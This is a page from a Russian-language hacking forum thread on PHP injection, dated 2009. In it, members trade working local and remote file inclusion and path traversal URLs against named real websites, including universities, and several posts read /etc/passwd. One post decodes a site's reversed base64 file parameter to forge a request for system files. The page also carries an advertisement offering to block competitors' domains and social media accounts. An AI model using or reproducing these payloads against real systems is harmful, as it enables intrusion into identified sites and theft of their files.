PHP Иньекции — ANTICHAT Forum

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
PHP Иньекции

Страница 94 из 143

« Первая

104

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#931

24.07.2009, 12:04

ilinsky

Новичок

Регистрация: 21.09.2008

Сообщений: 4

Провел на форуме:
19277

Репутация: 3

Директория

http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/

Файл в ней

http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME

#932

28.07.2009, 23:07

ph1l1ster

Постоянный

Регистрация: 11.03.2008

Сообщений: 347

Провел на форуме:
2075230

Репутация: 462

Банка,
multibanka.com

Берёт файл, например:

Код:

http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRhb2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdXRzbGF2XzI9ZW1hbl9lbGlm

Base64!
Декодируем:

Код:

sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utslav_2=eman_elif

^_^

Код:

file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu

Делаем по умному /etc/passwd

Код:

/cte/=htap_elif;dwssap=eman_elif

И берём его

Код:

http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=

такая вот шн*га.

P.S:

get_file.php

PHP код:


		
			


    include "include_php/my_encoder.php";

    



    decode_str( $_GET['q'] );

    $file_type = explode('.',$_GET['file_name']);

    $file_type = end($file_type);

     if(strtolower($file_type)=='pdf')

        header('Content-type: application/pdf');

    

//print_r($_GET);

    header("Content-Description: File Transfer");

     header("Content-Disposition: attachment; filename=". $_GET['file_name']);

    header("Content-Transfer-Encoding:  binary");

    header("Content-Type: application/download");

    header("Accept-Ranges: bytes");

    header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));



        

  

                    $file = $_GET['file_path']."/".$_GET['file_name'];                    

                    $filename = fopen($file,"r");

                    $data = fread($filename, filesize($file));

                    fclose($filename);



                    echo $data;

my_encoder.php

PHP код:


		
			


    function encode_str($string) {        

        return base64_encode(strrev($string));

    }





    function decode_str($string) {

        $result = strrev(base64_decode($string));



            // SQL injection tests



                if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {

                    Header("Location: http://www.bs.lv/track_hacker.php");

                }



            $tmp_arr=split(";",$result);



            for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {

                $ta = split("=",$tmp_arr[$i]);



                if ($ta['0']) {

                    $_GET[$ta['0']] = $ta['1'];

                }

            }

        

    }

#933

29.07.2009, 14:04

ph1l1ster

Постоянный

Регистрация: 11.03.2008

Сообщений: 347

Провел на форуме:
2075230

Репутация: 462

http://www.lastminute-music.com/index.php?inc=/etc/passwd

http://www.pubs.org.au/index.php?inc=/etc/passwd

#934

03.08.2009, 12:32

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

тИЦ: 50
PR: 4

RFI

Код:

http://www.bloodfmba.ru/news/mir.php?id=RFI

Последний раз редактировалось jokester; 03.08.2009 в 13:21.. Причина: Правила!!!!

#935

05.08.2009, 17:29

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

http://www.centerforloss.com/articles.php?file=

Локальный инклюд.
До /etc/passwd несмог пробраться, на хостинге фильтр.

Цитата:

http://www.matchmaking.at/athen2008/index.php?file=

локальный инклюд.
что то ненашёл /etc/passwd

Цитата:

http://www.westbalkanresearch.net/index.php?file=

Такая же беда

Последний раз редактировалось Ctacok; 05.08.2009 в 17:37..

#936

06.08.2009, 09:51

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

PR4

LFI

Код:

http://www.akademiaurody.com/index.php?id=[LFI]

#937

07.08.2009, 12:57

FireFenix

Постоянный

Регистрация: 03.06.2009

Сообщений: 385

Провел на форуме:
3178262

Репутация: 389

LFI

тИЦ 240
PR 5/10

Код:

http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd

#938

07.08.2009, 15:00

FireFenix

Постоянный

Регистрация: 03.06.2009

Сообщений: 385

Провел на форуме:
3178262

Репутация: 389

На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj

LFI

Код:

http://www.uvm.edu/student_life/?Page=../phpinfo.php

#939

07.08.2009, 16:27

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

ну и от меня кусочек

Код HTML:

http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00

Код HTML:

http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00

Код HTML:

http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00

Код HTML:

http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00

Последний раз редактировалось satana-fu; 07.08.2009 в 17:09..

#940

08.08.2009, 02:17

+++AndreyDevil+++

Участник форума

Регистрация: 28.12.2008

Сообщений: 136

Провел на форуме:
1311435

Репутация: 90

http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd

Страница 94 из 143

« Первая

104

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход